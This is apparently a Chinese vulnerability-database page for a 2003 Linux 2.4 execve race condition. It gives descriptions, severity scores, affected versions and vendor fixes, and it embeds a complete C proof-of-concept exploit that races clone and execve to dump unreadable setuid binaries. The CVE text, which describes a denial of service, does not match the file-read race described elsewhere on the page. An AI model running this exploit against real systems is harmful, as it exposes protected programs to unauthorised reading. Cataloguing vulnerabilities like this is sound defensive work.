CVE-2003-0462
CVSS1.2
发布时间 :2003-08-27 00:00:00
修订时间 :2008-09-10 15:19:04
NMCOES    

[原文]A race condition in the way env_start and env_end pointers are initialized in the execve system call and used in fs/proc/base.c on Linux 2.4 allows local users to cause a denial of service (crash).


[CNNVD]Linux 2.4内核execve()系统调用竞争条件洞(CNNVD-200308-176)

        
        Linux是开放源代码的操作系统。
        Linux execve()系统调用存在竞争条件漏洞,本地攻击者可以利用这个漏洞读取某个本无权读取的SUID程序的内容。
        execve()函数存在如下代码(fs/binfmt_elf.c):
        static int load_elf_binary(struct linux_binprm * bprm, struct pt_regs *
        regs)
        {
         struct file *interpreter = NULL; /* to shut gcc up */
        [...]
         retval = kernel_read(bprm->file, elf_ex.e_phoff, (char *)
        elf_phdata, size);
         if (retval < 0)
         goto out_free_ph;
         retval = get_unused_fd();
         if (retval < 0)
         goto out_free_ph;
         get_file(bprm->file);
         fd_install(elf_exec_fileno = retval, bprm->file);
        在执行新的二进制程序中,把打开的可执行文件描述符放到当前进程(当前execve()调用者)文件表中,并执行。这可以通过系统clone系统调用在父子进程间创建共享文件描述符然后读取该文件描述符。这允许攻击者读取suid程序的内容(即使攻击者本无权读取)。攻击者也有可能利用这一漏洞以特权状态下执行任意代码,但目前尚未经证实。
        

- CVSS (基础分值)

CVSS分值: 1.2 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:linux:linux_kernel:2.4.16Linux Kernel 2.4.16
cpe:/o:linux:linux_kernel:2.4.1Linux Kernel 2.4.1
cpe:/a:mandrakesoft:mandrake_multi_network_firewall:8.2MandrakeSoft Mandrake Multi Network Firewall 8.2
cpe:/o:linux:linux_kernel:2.4.6Linux Kernel 2.4.6
cpe:/o:linux:linux_kernel:2.4.17Linux Kernel 2.4.17
cpe:/o:linux:linux_kernel:2.4.14Linux Kernel 2.4.14
cpe:/o:linux:linux_kernel:2.4.7Linux Kernel 2.4.7
cpe:/o:mandrakesoft:mandrake_linux:8.2::ppc
cpe:/o:linux:linux_kernel:2.4.10Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.4.11Linux Kernel 2.4.11
cpe:/o:mandrakesoft:mandrake_linux_corporate_server:2.1MandrakeSoft Mandrake Linux Corporate Server 2.1
cpe:/o:linux:linux_kernel:2.4.4Linux Kernel 2.4.4
cpe:/o:linux:linux_kernel:2.4.13Linux Kernel 2.4.13
cpe:/o:linux:linux_kernel:2.4.19Linux Kernel 2.4.19
cpe:/o:linux:linux_kernel:2.4.9Linux Kernel 2.4.9
cpe:/o:linux:linux_kernel:2.4.18Linux Kernel 2.4.18
cpe:/o:linux:linux_kernel:2.4.8Linux Kernel 2.4.8
cpe:/o:linux:linux_kernel:2.4.20Linux Kernel 2.4.20
cpe:/o:linux:linux_kernel:2.4.5Linux Kernel 2.4.5
cpe:/o:mandrakesoft:mandrake_linux:8.2MandrakeSoft Mandrake Linux 8.2
cpe:/o:linux:linux_kernel:2.4.12Linux Kernel 2.4.12
cpe:/o:mandrakesoft:mandrake_linux:9.0MandrakeSoft Mandrake Linux 9.0
cpe:/o:linux:linux_kernel:2.4.21Linux Kernel 2.4.21
cpe:/o:linux:linux_kernel:2.4.15Linux Kernel 2.4.15
cpe:/o:linux:linux_kernel:2.4.0Linux Kernel 2.4.0
cpe:/o:linux:linux_kernel:2.4.2Linux Kernel 2.4.2
cpe:/o:linux:linux_kernel:2.4.3Linux Kernel 2.4.3

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:309Linux Kernel execve Race Condition Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0462
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0462
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-176
(官方数据源) CNNVD

- 其它链接及资源

http://www.redhat.com/support/errata/RHSA-2003-238.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:238
http://www.debian.org/security/2004/dsa-423
(VENDOR_ADVISORY)  DEBIAN  DSA-423
http://www.redhat.com/support/errata/RHSA-2003-198.html
(UNKNOWN)  REDHAT  RHSA-2003:198
http://www.debian.org/security/2004/dsa-358
(UNKNOWN)  DEBIAN  DSA-358
http://www.redhat.com/support/errata/RHSA-2003-239.html
(UNKNOWN)  REDHAT  RHSA-2003:239

- 漏洞信息

Linux 2.4内核execve()系统调用竞争条件洞
低危 竞争条件
2003-08-27 00:00:00 2005-10-20 00:00:00
本地  
        
        Linux是开放源代码的操作系统。
        Linux execve()系统调用存在竞争条件漏洞,本地攻击者可以利用这个漏洞读取某个本无权读取的SUID程序的内容。
        execve()函数存在如下代码(fs/binfmt_elf.c):
        static int load_elf_binary(struct linux_binprm * bprm, struct pt_regs *
        regs)
        {
         struct file *interpreter = NULL; /* to shut gcc up */
        [...]
         retval = kernel_read(bprm->file, elf_ex.e_phoff, (char *)
        elf_phdata, size);
         if (retval < 0)
         goto out_free_ph;
         retval = get_unused_fd();
         if (retval < 0)
         goto out_free_ph;
         get_file(bprm->file);
         fd_install(elf_exec_fileno = retval, bprm->file);
        在执行新的二进制程序中,把打开的可执行文件描述符放到当前进程(当前execve()调用者)文件表中,并执行。这可以通过系统clone系统调用在父子进程间创建共享文件描述符然后读取该文件描述符。这允许攻击者读取suid程序的内容(即使攻击者本无权读取)。攻击者也有可能利用这一漏洞以特权状态下执行任意代码,但目前尚未经证实。
        

- 公告与补丁

        厂商补丁:
        Linux
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.kernel.org/

- 漏洞信息 (22840)

Linux 2.4 Kernel execve() System Call Race Condition Vulnerability (EDBID:22840)
linux local
2003-06-26 Verified
0 IhaQueR
N/A [点击下载]
source: http://www.securityfocus.com/bid/8042/info

A race condition vulnerability has been discovered in the Linux execve() system call, affecting the 2.4 kernel tree. The problem lies in the atomicity of placing a target executables file descriptor within the current process descriptor and executing the file.

An attacker could potentially exploit this vulnerability to gain read access to a setuid binary that would otherwise be unreadable. Although unconfirmed, it may also be possible for an attacker to write code to a target executable, making it theoretically possible to execute arbitrary code with elevated privileges.

/****************************************************************
*								*
*	Linux 2.4.x suid exec/file read race proof of concept	*
*	by IhaQueR						*
*								*
****************************************************************/



#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sched.h>
#include <fcntl.h>
#include <signal.h>

#include <sys/types.h>
#include <sys/stat.h>

#include <asm/page.h>



void fatal(const char *msg)
{
    printf("\n");
    if (!errno) {
	fprintf(stderr, "FATAL: %s\n", msg);
    } else {
	perror(msg);
    }

    printf("\n");
    fflush(stdout);
    fflush(stderr);
    exit(129);
}


int child(char **av)
{
    int fd;

    printf("\nChild running pid %d", getpid());
    fflush(stdout);
    usleep(100000);

    execvp(av[0], av + 1);

    printf("\nFatal child exit\n");
    fflush(stdout);
    exit(0);
}


void exitus(int v)
{
    printf("\nParent terminating (child exited)\n\n");
    fflush(stdout);
    exit(129);
}

void usage(const char *name)
{
    printf("\nSuid exec dumper by IhaQueR\n");
    printf("\nUSAGE:\t%s executable [args...]", name);
    printf("\n\n");
    fflush(stdout);
    exit(0);
}


int main(int ac, char **av)
{
    int p = 0, fd = 0;
    struct stat st, st2;

    if (ac < 2)
	usage(av[0]);

    av[0] = (char *) strdup(av[1]);
    av[1] = (char *) basename(av[1]);

    p = stat(av[0], &st2);
    if (p)
	fatal("stat");

    signal(SIGCHLD, &exitus);
    printf("\nParent running pid %d", getpid());
    fflush(stdout);

    __asm__ (
             "pusha              \n"
             "movl $0x411, %%ebx \n"
             "movl %%esp, %%ecx  \n"
             "movl $120, %%eax   \n"
             "int  $0x80         \n"
             "movl %%eax, %0     \n"
             "popa"
             : : "m"(p)
            );

    if (p < 0)
	fatal("clone");

    if (!p)
	child(av);

    printf("\nParent stat loop");
    fflush(stdout);
    while (1) {
	p = fstat(3, &st);
	if (!p) {
	    if (st.st_ino != st2.st_ino)
		fatal("opened wrong file!");

	    p = lseek(3, 0, SEEK_SET);
	    if (p == (off_t) - 1)
		fatal("lseek");
	    fd = open("suid.dump", O_RDWR | O_CREAT | O_TRUNC | O_EXCL,
		      0755);
	    if (fd < 0)
		fatal("open");
	    while (1) {
		char buf[8 * PAGE_SIZE];

		p = read(3, buf, sizeof(buf));
		if (p <= 0)
		    break;
		write(fd, buf, p);
	    }
	    printf("\nParent success stating:");
	    fflush(stdout);
	    printf("\nuid %d gid %d mode %.5o inode %u size %u",
		   st.st_uid, st.st_gid, st.st_mode, st.st_ino,
		   st.st_size);
	    fflush(stdout);
	    printf("\n");
	    fflush(stdout);
	    exit(1);
	}
    }

    printf("\n\n");
    fflush(stdout);

    return 0;
}

		

- 漏洞信息

10297
Linux Kernel env_start/env_end Race Condition DoS
Denial of Service
Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-07-21 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Linux 2.4 Kernel execve() System Call Race Condition Vulnerability
Race Condition Error 8042
No Yes
2003-06-26 12:00:00 2009-07-11 10:56:00
The discovery of this vulnerability has been credited to Paul Starzetz <paul@starzetz.de>.

- 受影响的程序版本

RedHat Linux Advanced Work Station 2.1
RedHat kernel-utils-2.4-8.29.i386.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-utils-2.4-8.13.i386.rpm
+ RedHat Linux 8.0
RedHat kernel-utils-2.4-7.4.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-uml-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-source-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-source-2.4.20-8.i386.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-source-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-source-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-source-2.4.18-14.i386.rpm
+ RedHat Linux 8.0
RedHat kernel-smp-2.4.7-10.i686.rpm
+ RedHat Linux 7.2
RedHat kernel-smp-2.4.7-10.i586.rpm
+ RedHat Linux 7.2
RedHat kernel-smp-2.4.7-10.athlon.rpm
+ RedHat Linux 7.2
RedHat kernel-smp-2.4.20-8.i686.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-smp-2.4.20-8.athlon.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-smp-2.4.2-2.i686.rpm
+ RedHat Linux 7.1
RedHat kernel-smp-2.4.2-2.i586.rpm
+ RedHat Linux 7.1
RedHat kernel-smp-2.4.18-3.i686.rpm
+ RedHat Linux 7.3
RedHat kernel-smp-2.4.18-3.i586.rpm
+ RedHat Linux 7.3
RedHat kernel-smp-2.4.18-3.athlon.rpm
+ RedHat Linux 7.3
RedHat kernel-smp-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-smp-2.4.18-14.athlon.rpm
+ RedHat Linux 8.0
RedHat kernel-headers-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-headers-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-enterprise-2.4.2-2.i686.rpm
+ RedHat Linux 7.1
RedHat kernel-doc-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-doc-2.4.20-8.i386.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-doc-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-doc-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-doc-2.4.18-14.i386.rpm
+ RedHat Linux 8.0
RedHat kernel-debug-2.4.18-3.i686.rpm
+ RedHat Linux 7.3
RedHat kernel-debug-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-BOOT-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-BOOT-2.4.20-8.i386.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-BOOT-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-BOOT-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-BOOT-2.4.18-14.i386.rpm
+ RedHat Linux 8.0
RedHat kernel-bigmem-2.4.20-8.i686.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-bigmem-2.4.18-3.i686.rpm
+ RedHat Linux 7.3
RedHat kernel-bigmem-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-2.4.7-10.i686.rpm
+ RedHat Linux 7.2
RedHat kernel-2.4.7-10.i386.rpm
+ RedHat Linux 7.2
RedHat kernel-2.4.7-10.athlon.rpm
+ RedHat Linux 7.2
RedHat kernel-2.4.20-8.i686.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-2.4.20-8.i586.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-2.4.20-8.athlon.rpm
+ RedHat Linux 9.0 i386
RedHat kernel-2.4.2-2.i686.rpm
+ RedHat Linux 7.1
RedHat kernel-2.4.2-2.i586.rpm
+ RedHat Linux 7.1
RedHat kernel-2.4.2-2.i386.rpm
+ RedHat Linux 7.1
RedHat kernel-2.4.18-3.i686.rpm
+ RedHat Linux 7.3
RedHat kernel-2.4.18-3.i386.rpm
+ RedHat Linux 7.3
RedHat kernel-2.4.18-3.athlon.rpm
+ RedHat Linux 7.3
RedHat kernel-2.4.18-14.i686.rpm
+ RedHat Linux 8.0
RedHat kernel-2.4.18-14.i586.rpm
+ RedHat Linux 8.0
RedHat kernel-2.4.18-14.athlon.rpm
+ RedHat Linux 8.0
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Mandriva Linux Mandrake 9.0
Mandriva Linux Mandrake 8.2 ppc
Mandriva Linux Mandrake 8.2
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 2.1
Linux kernel 2.4.21
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ SuSE SUSE Linux Enterprise Server 8
Linux kernel 2.4.20
+ CRUX CRUX Linux 1.0
+ Gentoo Linux 1.4
+ Gentoo Linux 1.2
+ RedHat Linux 9.0 i386
+ Slackware Linux 9.0
+ WOLK WOLK 4.4 s
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
+ Sun Cobalt RaQ 550
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
+ S.u.S.E. Linux 7.3
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
Linux kernel 2.4.1
Linux kernel 2.4

- 漏洞讨论

A race condition vulnerability has been discovered in the Linux execve() system call, affecting the 2.4 kernel tree. The problem lies in the atomicity of placing a target executables file descriptor within the current process descriptor and executing the file.

An attacker could potentially exploit this vulnerability to gain read access to a setuid binary that would otherwise be unreadable. Although unconfirmed, it may also be possible for an attacker to write code to a target executable, making it theoretically possible to execute arbitrary code with elevated privileges.

- 漏洞利用

The following proof of concept exploit has been made available:

- 解决方案

Debian has released an advisory (DSA 423-1) that addresses the issue that is described in this BID for the IA-64 architecture. Further details regarding obtaining and applying fixes can be found in the referenced advisory.

Debian has released an advisory (DSA 358-1) that addresses these issues. Details on obtaining and applying fixes can be found in the referenced advisory.

Debian has also released an updated advisory DSA 358-4. Details concerning obtaining and applying fixes can be found in the referenced advisory.

Mandrake Linux have released a security advisory (MDKSA-2003:074) to address this issue. Further details regarding downloading and applying these fixes can be found in the referenced advisory. Fixes are linked below.

Red Hat has released an advisory (RHSA-2003:238-01) that addresses this and a number of other vulnerabilities. Please see the attached advisory for details on obtaining and applying fixes.

Guardian Digital has released advisory ESA-20032407-018 to address this issue. See referenced advisory for additional information.

Conectiva has released an advisory (CLSA-2003:712) that provides kernel updates for CLEE. Please see the attached advisory for details for obtaining and applying updates.

SuSE has released advisory SuSE-SA:2003:034 to address this issue. Specific update information has been made available. Refer to the referenced advisory for additional details.

Gentoo has released advisory 200308-01 to address this issue. Affected users are advised to execute the following commands:

emerge sync
emerge gentoo-sources
emerge clean

Red Hat has released an advisory (RHSA-2003:198-16) containing updated IA64 fixes for Red Hat Enterprise Linux AS (v. 2.1) and Red Hat Linux Advanced Workstation 2.1 for the Itanium Processor. These fixes are only available through the Red Hat Network which can be found at http://rhn.redhat.com/.

Red Hat has also released an advisory (RHSA-2003-239) containing kernel fixes for Red Hat Enterprise Linux AS, ES, and WS(v. 2.1). These fixes are also only available through the Red Hat Network which can be found at http://rhn.redhat.com/.

Turbolinux has released an advisory with fixes in order to address this and other issues.

RHBA-2003:263-05 (for non-Enterprise Red Hat distributions) has been released to address unrelated bugs but provides Kernel updates that include more recent fixes for this and other security vulnerabilities.

Conectiva has released a security advisory (CLA-2003:796) containing fixes to address this issue in Conectiva Linux 8.


RedHat kernel-2.4.18-3.i686.rpm

RedHat kernel-2.4.2-2.i386.rpm

RedHat kernel-source-2.4.18-14.i386.rpm

RedHat kernel-bigmem-2.4.18-14.i686.rpm

RedHat kernel-BOOT-2.4.7-10.i386.rpm

RedHat kernel-doc-2.4.2-2.i386.rpm

RedHat kernel-2.4.20-8.athlon.rpm

RedHat kernel-source-2.4.2-2.i386.rpm

RedHat kernel-2.4.7-10.athlon.rpm

RedHat kernel-doc-2.4.18-3.i386.rpm

RedHat kernel-BOOT-2.4.20-8.i386.rpm

RedHat kernel-2.4.20-8.i586.rpm

RedHat kernel-2.4.7-10.i686.rpm

RedHat kernel-bigmem-2.4.20-8.i686.rpm

RedHat kernel-source-2.4.20-8.i386.rpm

RedHat kernel-2.4.20-8.i686.rpm

RedHat kernel-BOOT-2.4.18-3.i386.rpm

RedHat kernel-doc-2.4.18-14.i386.rpm

RedHat kernel-BOOT-2.4.2-2.i386.rpm

RedHat kernel-2.4.7-10.i386.rpm

RedHat kernel-2.4.18-3.athlon.rpm

RedHat kernel-2.4.18-3.i386.rpm

RedHat kernel-bigmem-2.4.18-3.i686.rpm

RedHat kernel-source-2.4.7-10.i386.rpm

RedHat kernel-2.4.18-14.i586.rpm

RedHat kernel-2.4.18-14.i686.rpm

RedHat kernel-doc-2.4.20-8.i386.rpm

RedHat kernel-BOOT-2.4.18-14.i386.rpm

RedHat kernel-2.4.18-14.athlon.rpm

RedHat kernel-2.4.2-2.i686.rpm

RedHat kernel-2.4.2-2.i586.rpm

RedHat kernel-doc-2.4.7-10.i386.rpm

MandrakeSoft Multi Network Firewall 2.0

MandrakeSoft Corporate Server 2.1

Linux kernel 2.4.18

Linux kernel 2.4.19

Linux kernel 2.4.20

Mandriva Linux Mandrake 8.2

Mandriva Linux Mandrake 8.2 ppc

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站